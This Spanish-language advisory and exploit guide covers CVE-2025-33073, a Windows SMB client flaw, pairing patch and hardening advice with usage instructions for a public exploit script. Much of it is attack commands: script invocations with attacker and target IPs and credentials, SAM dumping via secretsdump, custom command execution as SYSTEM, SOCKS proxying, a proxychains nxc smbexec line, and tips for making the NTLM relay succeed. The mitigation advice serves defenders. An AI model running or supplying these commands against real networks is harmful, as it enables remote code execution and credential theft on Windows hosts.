
CVE-2025-33073
🔥 Ejecución remota de código autenticada de alta gravedad 🔥 Control de acceso inadecuado en el cliente SMB de Windows (CWE-284)
| Aspecto | Detalles |
|---|
| Puntuación CVSS v3.1 | 8.8 (Alta) 🔥 |
| Sistemas afectados | Windows 10, 11, Server 2012–2025 (todas las ediciones) 💻 |
| Fecha de divulgación | 10 de junio de 2025 📅 (Parcheado en el Patch Tuesday de junio de 2025) |
| Explotación | Explotada activamente en entornos reales 😱 Añadida al KEV de CISA el 21 de octubre de 2025 |
| Vector de ataque | Red (Autenticado) 🌐 |
| Impacto | Ejecución de código a nivel de SYSTEM 👑 Movimiento lateral mediante relay Kerberos |
| Omisión | Mitigaciones de reflexión NTLM ⚡ |
¡Parchea ahora! 🔧
→ Aplica las actualizaciones de Microsoft (p. ej., KB5060998)
→ Guía de actualización de Microsoft 🔗
Habilita la firma SMB ✍️
→ Impónla en todos los clientes y servidores
→ Set-SmbClientConfiguration -RequireSecuritySignature $true
Restringe NTLM 🚫
→ Bloquea NTLM cuando sea posible
→ Supervisa los intentos de relay con herramientas EDR
¿Solución automatizada? 🤖
→ Usa Vicarius vRx o scripts personalizados para remediación masiva
Estado al 15 de noviembre de 2025:
✅ Parcheado
❌ Aún explotado en sistemas sin parchear
🔔 Fecha límite de CISA: 10 de noviembre de 2025 ⏰
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

Comando personalizado En lugar de ejecutar secretsdump, se puede ejecutar un comando personalizado.
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS Para una ejecución más sigilosa de comandos después de haber establecido una conexión válida como SYSTEM. Aquí --target y --target-ip deben ser iguales.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

También se puede ejecutar un comando personalizado a través de proxychains en lugar de volcar SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Si estás en el mismo dominio de difusión que el dispositivo y es vulnerable al envenenamiento LLMNR, es posible explotar un dispositivo sin tener que registrar un registro DNS.

He visto que el ataque a veces no funciona porque se usa el nombre de host para el ataque, lo que produce una búsqueda DNS desde Kali. Si Kali no está usando el servidor DNS u obtienes un mensaje '/ FAILED' de impacket-ntlmrelayx, prueba a añadir el host a tu archivo /etc/hosts. Esto debería hacer que el ataque funcione.
Si se usa IP, el ataque debería funcionar. A veces, ejecutarlo varias veces da como resultado un SUCCESS en lugar de un fallo. Hasta ahora no está del todo claro por qué ocurre esto. Creo que tiene algo que ver con la red.
Prueba otro método de coacción usando -M o --method.
Se realiza la autenticación NTLM local

No se realiza la autenticación NTLM local, lo que da como resultado un intento FAILED

¡No esperes: parchea hoy! 🛑
La seguridad de tu red depende de ello. 💪